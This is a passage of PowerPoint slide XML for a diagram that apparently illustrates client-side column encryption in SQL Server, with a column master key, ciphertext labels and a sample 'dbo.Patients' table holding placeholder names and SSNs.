                      <a:pt x="53619" y="61255"/>
                      <a:pt x="46888" y="61255"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="47468" y="17532"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43681" y="17333"/>
                      <a:pt x="39830" y="18360"/>
                      <a:pt x="36547" y="20648"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29978" y="25222"/>
                      <a:pt x="27348" y="33667"/>
                      <a:pt x="30159" y="41162"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29615" y="41365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62407" y="41365"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="65562" y="34644"/>
                      <a:pt x="63689" y="26692"/>
                      <a:pt x="58003" y="21774"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54976" y="19155"/>
                      <a:pt x="51254" y="17730"/>
                      <a:pt x="47468" y="17532"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="48385" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55959" y="446"/>
                      <a:pt x="63402" y="3297"/>
                      <a:pt x="69456" y="8533"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79598" y="17305"/>
                      <a:pt x="83675" y="30904"/>
                      <a:pt x="78885" y="43093"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87177" y="43906"/>
                      <a:pt x="93101" y="51139"/>
                      <a:pt x="93101" y="59752"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="93101" y="119654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="119655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59752"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="51365"/>
                      <a:pt x="5617" y="44289"/>
                      <a:pt x="13654" y="43326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9060" y="29605"/>
                      <a:pt x="14482" y="14678"/>
                      <a:pt x="26544" y="6281"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33111" y="1706"/>
                      <a:pt x="40813" y="-348"/>
                      <a:pt x="48385" y="49"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="6821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113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Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="203" name="Freeform 202"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="727207" y="3723633"/>
                <a:ext cx="299324" cy="288021"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 2002754 w 2055898"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX1" fmla="*/ 1643743 w 2055898"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX2" fmla="*/ 1080505 w 2055898"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX3" fmla="*/ 1028538 w 2055898"/>
                  <a:gd name="connsiteY3" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX4" fmla="*/ 1027360 w 2055898"/>
                  <a:gd name="connsiteY4" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX5" fmla="*/ 975393 w 2055898"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX6" fmla="*/ 412155 w 2055898"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX7" fmla="*/ 53144 w 2055898"/>
                  <a:gd name="connsiteY7" fmla="*/ 0 h 2145774"/>
                  <a:gd name="connsiteX8" fmla="*/ 0 w 2055898"/>
                  <a:gd name="connsiteY8" fmla="*/ 53253 h 2145774"/>
                  <a:gd name="connsiteX9" fmla="*/ 0 w 2055898"/>
                  <a:gd name="connsiteY9" fmla="*/ 114342 h 2145774"/>
                  <a:gd name="connsiteX10" fmla="*/ 1781759 w 2055898"/>
                  <a:gd name="connsiteY10" fmla="*/ 2145774 h 2145774"/>
                  <a:gd name="connsiteX11" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY11" fmla="*/ 2145774 h 2145774"/>
                  <a:gd name="connsiteX12" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY12" fmla="*/ 1119360 h 2145774"/>
                  <a:gd name="connsiteX13" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY13" fmla="*/ 1079667 h 2145774"/>
                  <a:gd name="connsiteX14" fmla="*/ 2055898 w 2055898"/>
                  <a:gd name="connsiteY14" fmla="*/ 53253 h 2145774"/>
                  <a:gd name="connsiteX15" fmla="*/ 2002754 w 2055898"/>
                  <a:gd name="connsiteY15" fmla="*/ 0 h 214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5898" h="2145774">
                    <a:moveTo>
                      <a:pt x="2002754" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1643743" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1080505" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1028538" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1027360" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="975393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412155" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53144" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23793" y="0"/>
                      <a:pt x="0" y="23842"/>
                      <a:pt x="0" y="53253"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="114342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1781759" y="2145774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="2145774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="1119360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="1079667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2055898" y="53253"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2055898" y="23842"/>
                      <a:pt x="2032105" y="0"/>
                      <a:pt x="2002754" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="2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sp>
            <p:nvSpPr>
              <p:cNvPr id="204" name="TextBox 203"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="533118" y="3920761"/>
                <a:ext cx="1513036" cy="706435"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="182755" tIns="146203" rIns="182755" bIns="146203" rtlCol="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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t>Column</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="600"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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t>master</a:t>
                </a:r>
                <a:br>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199"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br>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1199" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="68217A"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="205" name="TextBox 204"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4956467" y="2640831"/>
              <a:ext cx="1269922" cy="311948"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931316"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8C00"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Client side</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="206" name="Group 205"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9290007" y="4608747"/>
              <a:ext cx="1239442" cy="542447"/>
              <a:chOff x="6963658" y="5721150"/>
              <a:chExt cx="1239941" cy="542665"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="207" name="TextBox 206"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6963658" y="5721150"/>
                <a:ext cx="1239941" cy="369352"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="931316" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1799" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="FF8C00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>ciphertext</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="208" name="Straight Connector 207"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="7263880" y="6035880"/>
                <a:ext cx="176896" cy="22793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7835343" y="4756055"/>
              <a:ext cx="3313581" cy="1602339"/>
              <a:chOff x="6227735" y="4691969"/>
              <a:chExt cx="3315381" cy="1603210"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="210" name="Rectangle 209"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6227736" y="5116366"/>
                <a:ext cx="1395172" cy="28465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Name</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="211" name="Rectangle 210"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7640369" y="5401023"/>
                <a:ext cx="1166510"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>000-24-9812</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="215" name="Rectangle 214"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7640369" y="5116366"/>
                <a:ext cx="1166510" cy="28465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SSN</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="217" name="Rectangle 216"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8824340" y="5116366"/>
                <a:ext cx="718776" cy="28465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Country</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="220" name="Rectangle 219"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6227736" y="5705773"/>
                <a:ext cx="1395172"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Luka Abrus</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="222" name="Rectangle 221"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7640369" y="5705773"/>
                <a:ext cx="1166510"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>000-33-0987</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="223" name="Rectangle 222"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8824340" y="5705773"/>
                <a:ext cx="718776"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="224" name="Rectangle 223"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6227736" y="6010522"/>
                <a:ext cx="1395172"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Tanja Plate</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="225" name="Rectangle 224"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7640369" y="6010522"/>
                <a:ext cx="1166510"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>000-82-1095</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="226" name="Rectangle 225"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8824340" y="6010522"/>
                <a:ext cx="718776"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="227" name="Rectangle 226"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6227735" y="5401023"/>
                <a:ext cx="1395172"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>Mark Hanson</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="216" name="Rectangle 215"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="8824340" y="5401023"/>
                <a:ext cx="718776"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FFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>USA</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="228" name="Rectangle 227"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6243970" y="4691969"/>
                <a:ext cx="2188984" cy="47682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39" rIns="0" bIns="47539" numCol="1" rtlCol="0" anchor="b" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="950470"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8C00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>dbo.Patients</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="229" name="Group 228"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7323208" y="2069553"/>
              <a:ext cx="1539271" cy="2905115"/>
              <a:chOff x="7329487" y="1804012"/>
              <a:chExt cx="1539891" cy="2906284"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="230" name="Group 229"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7696895" y="2582358"/>
                <a:ext cx="822844" cy="1068543"/>
                <a:chOff x="9791917" y="3493013"/>
                <a:chExt cx="493807" cy="641258"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="233" name="Oval 122"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9800365" y="3493013"/>
                  <a:ext cx="476912" cy="90621"/>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8" rIns="91377" bIns="45688" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                  <a:prstTxWarp prst="textNoShape">
                    <a:avLst/>
                  </a:prstTxWarp>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932049"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Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="234" name="Freeform 123"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9791917" y="3555988"/>
                  <a:ext cx="493807" cy="578283"/>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7" tIns="45688" rIns="91377" bIns="45688" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
                  <a:prstTxWarp prst="textNoShape">
                    <a:avLst/>
                  </a:prstTxWarp>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="932049"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Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="231" name="Straight Connector 230"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8257709" y="3715069"/>
                <a:ext cx="6358" cy="995227"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="15875">
                <a:solidFill>
                  <a:srgbClr val="68217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7329487" y="1804012"/>
                <a:ext cx="1539891" cy="276982"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="931136" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                  <a:lnSpc>
                    <a:spcPct val="100000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="600"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                  <a:tabLst/>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1799" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:schemeClr val="accent5"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>SQL Server</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="235" name="Group 234"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7828026" y="4758477"/>
              <a:ext cx="3314827" cy="1602561"/>
              <a:chOff x="5883385" y="4685481"/>
              <a:chExt cx="3316637" cy="1603433"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="236" name="Rectangle 235"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5900609" y="4685481"/>
                <a:ext cx="2188984" cy="47682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39" rIns="0" bIns="47539" numCol="1" rtlCol="0" anchor="b" anchorCtr="0" compatLnSpc="1">
                <a:prstTxWarp prst="textNoShape">
                  <a:avLst/>
                </a:prstTxWarp>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="950470"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8C00"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>dbo.Patients</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="237" name="Rectangle 236"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5883385" y="5393031"/>
                <a:ext cx="1395172" cy="284657"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="BFBFB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Mark Hanson</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="238" name="Rectangle 237"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5883385" y="5106365"/>
                <a:ext cx="1395172" cy="28465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Name</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="240" name="Rectangle 239"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7296647" y="5106365"/>
                <a:ext cx="1166510" cy="28465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SSN</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="241" name="Rectangle 240"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
